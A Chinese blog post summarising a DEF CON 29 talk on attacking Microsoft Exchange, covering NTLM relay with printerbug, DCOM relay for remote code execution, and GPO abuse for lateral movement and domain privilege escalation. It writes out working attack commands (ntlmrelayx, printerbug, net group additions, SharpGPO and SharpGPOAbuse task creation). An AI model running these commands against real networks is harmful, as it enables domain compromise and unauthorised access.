前往小程序,Get更优阅读体验!
立即前往
首页
学习
活动
专区
圈层
工具
发布
首页
学习
活动
专区
圈层
工具
MCP广场
社区首页 >专栏 >议题解读:One Domain Account For More Than Exchange Server RCE

议题解读:One Domain Account For More Than Exchange Server RCE

作者头像
鸿鹄实验室
发布于 2021-08-25 02:18:05
发布于 2021-08-25 02:18:05
69700
代码可运行
举报
文章被收录于专栏:鸿鹄实验室鸿鹄实验室
运行总次数:0
代码可运行

本文是对defcon会议 One Domain Account For More Than Exchange Server RCE的简单解读(复制粘贴),pdf地址:

https://media.defcon.org/DEF%20CON%2029/DEF%20CON%2029%20presentations/Tianze%20Ding%20-%20Vulnerability%20Exchange%20-%20One%20Domain%20Account%20For%20More%20Than%20Exchange%20Server%20RCE.pdf

视频地址:https://www.youtube.com/watch?v=7h38rI8KT30

推荐一波该议题,给类组合拳。

议题速览

1、exchange攻击面总览

2、从域认证到Mailbox接管

3、从域认证到exchange rce

4、横向移动、域提权

议题部分

exchange的研究意义这里就不多说了,用户多、权限高,全球设备多

而且再域内拥有较高权限,有着拿下exchange就拿下域的说法,且在安装exchange默认的组具有writeacl权限,可进行各类组合攻击,但这类权限已被在2019年修复。

exchange的架构如下

已被攻陷的部分如下

从域认证到Mailbox接管

在exchange中,提供了各类导入、导出等指定路径的功能,而该路径为UNC路径,

而有过相关基础的就知道,UNC路径可获取到目标的认证消息,默认为机器账户的凭据

而这里便要提到ntlm relay攻击了,议题也对该攻击进行了简单介绍

那我们还需要知道那个exchange接口支持ntlm才能进行此类攻

以及一个EPA的概念

但exchange默认EPA是不会开启的。下面就是找一个relay的接口,就可以进行我们的攻击了,这里选择的EWS,EWS具有下面功能

然后配合打印机漏洞便可进行攻击,攻击链如下:

需要的工具:

https://github.com/quickbreach/ExchangeRelayX

https://github.com/dirkjanm/krbrelayx/

https://github.com/SecureAuthCorp/impacket/blob/master/examples/exchanger.py

命令:

代码语言:javascript
代码运行次数:0
运行
AI代码解释
复制
exchangeRelayx.py -t exchange2 address -l 0.0.0.0
printerbug.py domain/user:password@exchange1 attackaddress
exchanger.py domain/user:password@exchange1 nspi dump-tables -name GAL

此类攻击在2021被修复。

从域认证到exchange rce

首先,exchange的机器账户默认属于本地管理员组

然后作者说了几种relay场景以及为什么不能进行relay

然后作者发现可以使用DCOM得MSRPC进行攻击

选中的DCOM对象为

代码语言:javascript
代码运行次数:0
运行
AI代码解释
复制
MMC20.Application (49B2791A-B1AE-4C90-9B8E-E860BA07F89)

攻击链如下

工具:

https://github.com/SecureAuthCorp/impacket/blob/master/examples/ntlmrelayx.py

命令:

代码语言:javascript
代码运行次数:0
运行
AI代码解释
复制
ntlmrelayx.py -t dcom://exchange2 -smb2support
printerbug.py domain/user:password@exchange1 attackaddress

横向移动、域提权

横向移动

作者给的图以及很明了了,有一个Exchange Trusted Subsystem组成员权限的前提下,便可以利用GPO实现对指定用户(域管除外)的rce。

工具:

https://github.com/Dliv3/SharpGPO

https://github.com/FSecureLABS/SharpGPOAbuse

命令:

代码语言:javascript
代码运行次数:0
运行
AI代码解释
复制
net group "Exchange Trusted Subsystem" attacker /add /domain //将指定用户加的高权限组
net group "Group Policy Creator Owners" attacker /add /domain  //将指定用户加的高权限组
SharpGPO.exe --Action NewOU --OUName "EvilOU" //新建OU
SharpGPO.exe --Action NewGPO --GPOName "EvilGPO" //新建GPO
SharpGPO.exe --Action NewGPLink --DN "OU=EvilOU,DC=xx,DC=xx" --GPOName "EvilGPO" //OU与GPO进行链接
SharpGPOAbuse.exe --AddUserTask --TaskName "PocCalc" --Author attch --Command "cmd.exe" --Argument "/c calc.exe" --GPOName //给GPO添加任务
SharpGPO.exe --Action MoveObject --SrcDC "CN=XXX,CN=users,DC=xx,DC=xx" --DstDN "OU=EvilOU,DC=xx,DC=xx" //将指定用户移动到新建的OU中

域提权

原理跟上面类似,只是把用户改成了机器

工具:

https://github.com/Dliv3/SharpGPO

https://github.com/FSecureLABS/SharpGPOAbuse

命令:

代码语言:javascript
代码运行次数:0
运行
AI代码解释
复制
net group "Exchange Trusted Subsystem" attacker /add /domain //将指定用户加的高权限组
net group "Group Policy Creator Owners" attacker /add /domain  //将指定用户加的高权限组
SharpGPO.exe --Action NewOU --OUName "EvilOU" //新建OU
SharpGPO.exe --Action NewGPO --GPOName "EvilGPO" //新建GPO
SharpGPO.exe --Action NewGPLink --DN "OU=EvilOU,DC=xx,DC=xx" --GPOName "EvilGPO" //OU与GPO进行链接
SharpGPOAbuse.exe --AddUserTask --TaskName "PocCalc" --Author attch --Command "cmd.exe" --Argument "/c calc.exe" --GPOName
SharpGPO.exe --Action MoveObject --SrcDC "CN=XXX,OU=Domain Controllers,DC=xx,DC=xx" --DstDN "OU=EvilOU,DC=xx,DC=xx" //将指定机器移动到新建的OU中

最后移除新建的OU、GPO

代码语言:javascript
代码运行次数:0
运行
AI代码解释
复制
SharpGPO.exe --Action RemoveOU --OUName "EvilOU" //移除OU
SharpGPO.exe --Action RemoveGPO --GPOName "EvilGPO" //移除GPO
本文参与 腾讯云自媒体同步曝光计划,分享自微信公众号。
原始发表:2021-08-15,如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 鸿鹄实验室 微信公众号,前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体同步曝光计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
暂无评论
推荐阅读
编辑精选文章
换一批
【内网安全】横向移动-域渗透之资源约束委派
IPC,WMI,SMB,PTH,PTK,PTT,SPN,WinRM,WinRS,RDP,Plink,DCOM,SSH;Exchange,LLMNR投毒,NTLM-Relay,Kerberos_TGS,GPO&DACL,域控提权漏洞,约束委派,数据库攻防,系统补丁下发执行,EDR定向下发执行等。
没事就要多学习
2024/07/18
1820
【内网安全】横向移动-域渗透之资源约束委派
【内网安全】横向移动&NTLM-Relay重放&Responder中继攻击&Ldap&Ews
IPC,WMI,SMB,PTH,PTK,PTT,SPN,WinRM,WinRS,RDP,Plink,DCOM,SSH;Exchange,LLMNR投毒,NTLM-Relay,Kerberos_TGS,GPO&DACL,域控提权漏洞,约束委派,数据库攻防,系统补丁下发执行,EDR定向下发执行等。
没事就要多学习
2024/07/18
2490
【内网安全】横向移动&NTLM-Relay重放&Responder中继攻击&Ldap&Ews
基于资源的约束委派(RBCD)
给机器添加RBCD的前提:1.自己能给自己添加 2.ACL→Account Restriction/msDS-AllowedToActOnBehalfOfOtherIdentity属性→creator-sid/backdoor/high level user。如果对计算机对象/域用户具Account Restriction和msDS-AllowedToActOnBehalfOfOtherIdentity属性的WriteProperty,就能进行基于 资源约束委派的利用。
红队蓝军
2023/02/25
3.2K0
基于资源的约束委派(RBCD)
利用PetitPotam进行NTLM Relay攻击
2021年7月19日,法国安全研究人员Gilles Lionel披露了一种新型的NTLM Relay攻击利用手法——PetitPotam。该漏洞利用了微软加密文件系统远程协议(MS-EFSRPC,MicroSoft Encrypting File System Remote Protocol)。MS-EFSRPC是 Microsoft 的加密文件系统远程协议,用于对远程存储和通过网络访问的加密数据执行“维护和管理操作”。利用该漏洞,黑客通过连接到LSARPC强制触发目标机器向指定远程服务器发送Net-NTLM Hash,从而攻击者在拿到Net-NTLM Hash后能进行NTLM Relay攻击,进而接管整个域。该漏洞可以用于替代Printerbug。
谢公子
2022/01/20
2.7K0
利用PetitPotam进行NTLM Relay攻击
【内网安全】横向移动&Exchange服务&有账户CVE漏洞&无账户口令爆破
IPC,WMI,SMB,PTH,PTK,PTT,SPN,WinRM,WinRS,RDP,Plink,DCOM,SSH;Exchange,LLMNR投毒,Kerberos_TGS,GPO&DACL,域控提权漏洞,约束委派,数据库攻防,系统补丁下发执行,EDR定向下发执行等。
没事就要多学习
2024/07/18
2080
【内网安全】横向移动&Exchange服务&有账户CVE漏洞&无账户口令爆破
利用Account Operators组实现接管域控或权限提升
在域渗透的过程中,我们往往只会关注Domain admins组和Enterprise Admins组,而会忽略了其它组。今天,我们要讲的是Account Operators组。该组是内置的本地域组。该组的成员可以创建和管理该域中的用户和组并为其设置权限,也可以在本地登录域控制器。但是,不能更改属于Administrators或Domain Admins组的账号,也不能更改这些组。在默认情况下,该组中没有成员。也就是说,该组默认是域内管理用户和组的特殊权限组。可以创建和管理该域中的用户和组并为其设置权限,也可以在本地登录
谢公子
2022/01/20
2.2K0
利用Account Operators组实现接管域控或权限提升
横向移动与域控权限维持方法总汇
如果找到了某个用户的ntlm hash,就可以拿这个ntlm hash当作凭证进行远程登陆了 其中若hash加密方式是 rc4 ,那么就是pass the hash 若加密方式是aes key,那么就是pass the key 注意NTLM和kerberos协议均存在PTH: NTLM自然不用多说 kerberos协议也是基于用户的client hash开始一步步认证的,自然也会受PTH影响
ConsT27
2022/02/11
1.8K0
横向移动与域控权限维持方法总汇
ADCS证书服务攻击
由于ADCS的http证书接口没有启用NTLM中继保护,因此其易受NTLM Relay攻击。而且Authorization HTTP 标头明确只允许通过 NTLM 身份验证,因此Kerberos协议无法使用。因此,攻击者可以利用NTLM Relay攻击ADCS证书服务。
谢公子
2022/01/20
1.4K0
ADCS证书服务攻击
一次梦里的域环境实战攻击
说明:梦里项目,相关信息如ip,域名,账户等信息都是后期编的,可能会出现文不对题,不要纠结细节。
Jumbo
2022/11/11
1.2K0
一次梦里的域环境实战攻击
内网协议NTLM之内网大杀器CVE-2019-1040漏洞
Preempt的研究人员发现了如何在NTLM身份验证上绕过MIC(Message Integrity Code)保护措施并修改NTLM消息流中的任何字段(包括签名)。该种绕过方式允许攻击者将已经协商签名的身份验证尝试中继到另外一台服务器,同时完全删除签名要求。所有不执行签名的服务器都容易受到攻击。 这个漏洞其实就是可以绕过NTLM MIC的防护,也是NTLM_RELAY漏洞。攻击者利用该漏洞可以绕过NTLM中的MIC(Message Integrity Code)。攻击者可以修改已经协商签名的身份验证流量,然后中继到另外一台服务器,同时完全删除签名要求。通过该攻击方式可使攻击者在仅有一个普通域账号的情况下,运程控制域中任意机器(包括域控服务器)。
黑白天安全
2021/05/11
6.7K0
内网协议NTLM之内网大杀器CVE-2019-1040漏洞
横向渗透方法小结
第三方通用组件漏洞: struts、thinkphp、jboss、ganglia、zabbix等
红客突击队
2022/09/29
2.3K0
域渗透实战之Forest
发现其存在5985端口,如果找到用户的凭据,我可能能够通过 WinRM 获得 shell。
亿人安全
2023/09/15
6840
域渗透实战之Forest
【内网安全】 横向移动&IPC&AT&SC命令&Impacket套件&CS插件&全自动
IPC,WMI,SMB,PTH,PTK,PTT,SPN,WinRM,WinRS,RDP,Plink,DCOM,SSH;Exchange,LLMNR投毒,Plink,DCOM,Kerberos_TGS,GPO&DACL, 域控提权漏洞,约束委派,数据库攻防,系统补丁下发执行,EDR定向下发执行等。 前提条件:已取得webserver服务器普通域用户权限 简单使用ms14-058提权后,得到sysytem权限
没事就要多学习
2024/07/18
2260
【内网安全】 横向移动&IPC&AT&SC命令&Impacket套件&CS插件&全自动
【神兵利器】红队Active Directory侦察利用工具
SharpADWS 是一个为 Red Teams 打造的 Active Directory 侦查和利用工具,其通过 Active Directory Web Services (ADWS) 协议收集并修改 Active Directory 数据。
Al1ex
2025/01/07
1200
【神兵利器】红队Active Directory侦察利用工具
【内网安全】横向移动&域控提权&NetLogon&ADCS&PAC&KDC&永恒之蓝
IPC,WMI,SMB,PTH,PTK,PTT,SPN,WinRM,WinRS,RDP,Plink,DCOM,SSH;Exchange,LLMNR投毒,Kerberos_TGS,GPO&DACL,域控提权漏洞,约束委派,数据库攻防,系统补丁下发执行,EDR定向下发执行等。
没事就要多学习
2024/07/18
1470
【内网安全】横向移动&域控提权&NetLogon&ADCS&PAC&KDC&永恒之蓝
投稿 | 使用Exchange服务器中的Writedacl实现域提权的提权
在域环境中,如果安装Exchange后,系统会添加一个名为Microsoft Exchange Security Groups、Exchange Trusted Subsystem和Exchange Windows Permission三个组。如果获得了这三个组内任意用户的控制权限,就能够继承用户组的WriteDACL权限,WriteDACL权限可以修改域对象的ACL,最终实现利用DCSync导出域内所有用户hash。
Ms08067安全实验室
2021/06/16
1.9K0
投稿 | 使用Exchange服务器中的Writedacl实现域提权的提权
Sodinokibi(aka REvil)勒索软件
Sodinokibi(又名REvil)在过去的几年里一直是最多产的勒索软件即服务(RaaS)组织之一。据称,这一勒索软件家族是Travelex 入侵事件的幕后黑手,目前的报道指出,针对Acer(宏碁)的一次攻击,要求支付5000万美元的赎金。
Al1ex
2021/07/21
1.5K0
Sodinokibi(aka REvil)勒索软件
攻击AD证书服务获取域控权限
详细的介绍可以参考:https://posts.specterops.io/certified-pre-owned-d95910965cd2
Jumbo
2021/08/18
1.3K0
如何通过用户的编辑权限控制组策略对象(GPO)控制的对象
关于SharpGPOAbuse SharpGPOAbuse是一个功能强大的.NET应用程序,SharpGPOAbuse基于C#开发,可以帮助广大研究人员利用目标系统中用户针对一个组策略对象(GPO)的编辑权限来入侵并控制由该组策略对象(GPO)控制的对象。 项目获取 广大研究人员可以使用下列命令将该项目源码克隆至本地: git clone https://github.com/FSecureLABS/SharpGPOAbuse.git 代码编译 请确保本地主机中必要的NuGet包已正常安装,然后就可以使用
FB客服
2023/04/26
1.1K0
如何通过用户的编辑权限控制组策略对象(GPO)控制的对象
CVE-2019-1040 NTLM MIC 绕过漏洞
2019年6月11日,微软发布6月份安全补丁更新。在该安全补丁更新中,对 CVE-2019-1040 漏洞进行了修复。该漏洞存在于Windwos 大部分版本中,当中间人攻击者能够成功绕过NTLM 消息完整性校验(MIC)时,Windows 存在可能可篡改的漏洞。成功利用此漏洞的攻击者可以获得降级 NTLM 安全功能的能力。要利用此漏洞,攻击者需要篡改NTLM 交换,然后修改NTLM 数据包的标志,而不会使签名无效。结合其他漏洞和机制,在某些场景下,攻击者可以在仅有一个普通账户域账户的情况下接管全域。
FB客服
2023/08/08
5300
CVE-2019-1040 NTLM MIC 绕过漏洞
推荐阅读
相关推荐
【内网安全】横向移动-域渗透之资源约束委派
更多 >
领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档
本文部分代码块支持一键运行,欢迎体验
本文部分代码块支持一键运行,欢迎体验